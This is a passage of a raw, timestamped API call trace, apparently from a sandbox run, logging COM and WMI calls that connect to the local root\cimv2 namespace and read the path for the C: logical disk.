[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec54 | out: ppvObject=0x689ec54*=0x67383f0) returned 0x0 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec10 | out: ppvObject=0x689ec10*=0x0) returned 0x80004002 [0205.735] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e51c | out: ppvObject=0x689e51c*=0x0) returned 0x80004002 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e528 | out: ppvObject=0x689e528*=0x98210b8) returned 0x0 [0205.735] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x98210b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e530 | out: pCid=0x689e530*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.735] WbemDefPath:IUnknown:Release (This=0x98210b8) returned 0x3 [0205.735] CoGetContextToken (in: pToken=0x689e588 | out: pToken=0x689e588) returned 0x0 [0205.735] CoGetContextToken (in: pToken=0x689e538 | out: pToken=0x689e538) returned 0x0 [0205.735] CoGetContextToken (in: pToken=0x689e990 | out: pToken=0x689e990) returned 0x0 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea20 | out: ppvObject=0x689ea20*=0x0) returned 0x80004002 [0205.735] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0205.735] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0205.735] CoGetContextToken (in: pToken=0x689f318 | out: pToken=0x689f318) returned 0x0 [0205.735] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0205.735] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x689f348*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f344 | out: ppvObject=0x689f344*=0x67383f0) returned 0x0 [0205.735] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0205.735] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0205.735] WbemDefPath:IWbemPath:SetText (This=0x67383f0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.735] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0205.735] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4c8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c8*=0x20, pszText=0x0) returned 0x0 [0205.735] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f44c | out: puCount=0x689f44c*=0x0) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f438 | out: puCount=0x689f438*=0x2) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0x0, pszText=0x0 | out: puBuffLength=0x689f434*=0xf, pszText=0x0) returned 0x0 [0205.736] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f434*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.736] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f3e8 | out: ppv=0x689f3e8*=0x72015c) returned 0x0 [0205.736] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f3e0 | out: pAptType=0x689f3e0*=1) returned 0x0 [0205.736] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f3e4 | out: ppvObject=0x689f3e4*=0x0) returned 0x80004002 [0205.736] IUnknown:Release (This=0x72015c) returned 0x1 [0205.737] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ed50 | out: ppv=0x689ed50*=0x6736f58) returned 0x0 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ef68 | out: ppvObject=0x689ef68*=0x0) returned 0x80004002 [0205.737] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ef7c | out: ppvObject=0x689ef7c*=0x6738380) returned 0x0 [0205.737] WbemDefPath:IUnknown:Release (This=0x6736f58) returned 0x0 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eb9c | out: ppvObject=0x689eb9c*=0x6738380) returned 0x0 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eb58 | out: ppvObject=0x689eb58*=0x0) returned 0x80004002 [0205.737] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e464 | out: ppvObject=0x689e464*=0x0) returned 0x80004002 [0205.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e470 | out: ppvObject=0x689e470*=0x9820f68) returned 0x0 [0205.737] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820f68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e478 | out: pCid=0x689e478*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.737] WbemDefPath:IUnknown:Release (This=0x9820f68) returned 0x3 [0205.737] CoGetContextToken (in: pToken=0x689e4d0 | out: pToken=0x689e4d0) returned 0x0 [0205.737] CoGetContextToken (in: pToken=0x689e480 | out: pToken=0x689e480) returned 0x0 [0205.738] CoGetContextToken (in: pToken=0x689e8d8 | out: pToken=0x689e8d8) returned 0x0 [0205.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e968 | out: ppvObject=0x689e968*=0x0) returned 0x80004002 [0205.738] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0205.738] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x1 [0205.738] CoGetContextToken (in: pToken=0x689f260 | out: pToken=0x689f260) returned 0x0 [0205.738] CoGetContextToken (in: pToken=0x689f1c0 | out: pToken=0x689f1c0) returned 0x0 [0205.738] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738380, riid=0x689f290*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f28c | out: ppvObject=0x689f28c*=0x6738380) returned 0x0 [0205.738] WbemDefPath:IUnknown:AddRef (This=0x6738380) returned 0x3 [0205.738] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x2 [0205.738] WbemDefPath:IWbemPath:SetText (This=0x6738380, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0205.738] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x689f410 | out: puCount=0x689f410*=0x2) returned 0x0 [0205.738] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=4, puBuffLength=0x689f40c*=0x0, pszText=0x0 | out: puBuffLength=0x689f40c*=0xf, pszText=0x0) returned 0x0 [0205.738] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=4, puBuffLength=0x689f40c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f40c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.738] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f410 | out: ppv=0x689f410*=0x72015c) returned 0x0 [0205.738] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f408 | out: pAptType=0x689f408*=1) returned 0x0 [0205.738] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f40c | out: ppvObject=0x689f40c*=0x0) returned 0x80004002 [0205.738] IUnknown:Release (This=0x72015c) returned 0x1 [0205.739] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f030 | out: ppv=0x689f030*=0x673ebe8) returned 0x0 [0205.739] WbemLocator:IUnknown:QueryInterface (in: This=0x673ebe8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f248 | out: ppvObject=0x689f248*=0x0) returned 0x80004002 [0205.739] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ebe8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f25c | out: ppvObject=0x689f25c*=0x6736ed8) returned 0x0 [0205.739] WbemLocator:IUnknown:Release (This=0x673ebe8) returned 0x0 [0205.739] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee7c | out: ppvObject=0x689ee7c*=0x6736ed8) returned 0x0 [0205.739] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee38 | out: ppvObject=0x689ee38*=0x0) returned 0x80004002 [0205.739] WbemLocator:IUnknown:AddRef (This=0x6736ed8) returned 0x3 [0205.740] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0205.740] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e744 | out: ppvObject=0x689e744*=0x0) returned 0x80004002 [0205.740] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e750 | out: ppvObject=0x689e750*=0x0) returned 0x80004002 [0205.740] CoGetContextToken (in: pToken=0x689e7b0 | out: pToken=0x689e7b0) returned 0x0 [0205.740] CoGetContextToken (in: pToken=0x689e760 | out: pToken=0x689e760) returned 0x0 [0205.740] CoGetContextToken (in: pToken=0x689ebb8 | out: pToken=0x689ebb8) returned 0x0 [0205.740] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec48 | out: ppvObject=0x689ec48*=0x0) returned 0x80004002 [0205.740] WbemLocator:IUnknown:Release (This=0x6736ed8) returned 0x2 [0205.740] WbemLocator:IUnknown:Release (This=0x6736ed8) returned 0x1 [0205.740] CoGetContextToken (in: pToken=0x689f228 | out: pToken=0x689f228) returned 0x0 [0205.740] CoGetContextToken (in: pToken=0x689f188 | out: pToken=0x689f188) returned 0x0 [0205.740] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x689f258*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f254 | out: ppvObject=0x689f254*=0x6736ed8) returned 0x0 [0205.740] WbemLocator:IUnknown:AddRef (This=0x6736ed8) returned 0x3 [0205.740] WbemLocator:IUnknown:Release (This=0x6736ed8) returned 0x2 [0205.740] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738380, puCount=0x689f3ec | out: puCount=0x689f3ec*=0x2) returned 0x0 [0205.740] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=8, puBuffLength=0x689f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x689f3e8*=0xf, pszText=0x0) returned 0x0 [0205.740] WbemDefPath:IWbemPath:GetText (in: This=0x6738380, lFlags=8, puBuffLength=0x689f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.740] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f2c4 | out: ppv=0x689f2c4*=0x6736de8) returned 0x0 [0205.741] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736de8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f358 | out: ppNamespace=0x689f358*=0x6747fa4) returned 0x0 [0209.870] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1f4 | out: ppvObject=0x689f1f4*=0x781f94) returned 0x0 [0209.870] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781f94, pProxy=0x6747fa4, pAuthnSvc=0x689f244, pAuthzSvc=0x689f240, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c, pImpLevel=0x689f22c, pAuthInfo=0x689f230, pCapabilites=0x689f234 | out: pAuthnSvc=0x689f244*=0xa, pAuthzSvc=0x689f240*=0x0, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c*=0x6, pImpLevel=0x689f22c*=0x2, pAuthInfo=0x689f230, pCapabilites=0x689f234*=0x1) returned 0x0 [0209.870] WbemLocator:IUnknown:Release (This=0x781f94) returned 0x1 [0209.870] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e8 | out: ppvObject=0x689f1e8*=0x781fb4) returned 0x0 [0209.870] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e4 | out: ppvObject=0x689f1e4*=0x781f94) returned 0x0 [0209.871] WbemLocator:IClientSecurity:SetBlanket (This=0x781f94, pProxy=0x6747fa4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.871] WbemLocator:IUnknown:Release (This=0x781f94) returned 0x2 [0209.871] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x1 [0209.871] CoTaskMemFree (pv=0x77e0b8) [0209.871] WbemLocator:IUnknown:Release (This=0x6736de8) returned 0x0 [0209.871] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ede4 | out: ppvObject=0x689ede4*=0x781fb4) returned 0x0 [0209.871] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eda0 | out: ppvObject=0x689eda0*=0x0) returned 0x80004002 [0209.872] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ebbc | out: ppvObject=0x689ebbc*=0x0) returned 0x80004002 [0209.873] WbemLocator:IUnknown:AddRef (This=0x781fb4) returned 0x3 [0209.873] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0209.873] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6ac | out: ppvObject=0x689e6ac*=0x0) returned 0x80004002 [0209.877] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e6b8 | out: ppvObject=0x689e6b8*=0x781f14) returned 0x0 [0209.877] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781f14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e6c0 | out: pCid=0x689e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.877] WbemLocator:IUnknown:Release (This=0x781f14) returned 0x3 [0209.877] CoGetContextToken (in: pToken=0x689e718 | out: pToken=0x689e718) returned 0x0 [0209.877] CoGetContextToken (in: pToken=0x689eb20 | out: pToken=0x689eb20) returned 0x0 [0209.877] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebb0 | out: ppvObject=0x689ebb0*=0x781f9c) returned 0x0 [0209.877] WbemLocator:IRpcOptions:Query (in: This=0x781f9c, pPrx=0x781fb4, dwProperty=2, pdwValue=0x689ebd8 | out: pdwValue=0x689ebd8) returned 0x80004002 [0209.877] WbemLocator:IUnknown:Release (This=0x781f9c) returned 0x3 [0209.877] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x2 [0209.877] CoGetContextToken (in: pToken=0x689f0f8 | out: pToken=0x689f0f8) returned 0x0 [0209.877] CoGetContextToken (in: pToken=0x689f058 | out: pToken=0x689f058) returned 0x0 [0209.877] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x689f128*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f124 | out: ppvObject=0x689f124*=0x6747fa4) returned 0x0 [0209.877] WbemLocator:IUnknown:AddRef (This=0x6747fa4) returned 0x4 [0209.877] WbemLocator:IUnknown:Release (This=0x6747fa4) returned 0x3 [0209.877] WbemLocator:IUnknown:Release (This=0x6747fa4) returned 0x2 [0209.877] SysStringLen (param_1=0x0) returned 0x0 [0209.877] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f4bc | out: puCount=0x689f4bc*=0x0) returned 0x0 [0209.878] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4b8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4b8*=0x20, pszText=0x0) returned 0x0 [0209.878] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f4b8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4b8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.878] CoGetContextToken (in: pToken=0x689f128 | out: pToken=0x689f128) returned 0x0 [0209.878] WbemLocator:IUnknown:AddRef (This=0x781fb4) returned 0x3 [0209.878] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efbc | out: ppvObject=0x689efbc*=0x781fb4) returned 0x0 [0209.878] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x3 [0209.878] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x2 [0209.878] WbemDefPath:IWbemPath:GetText 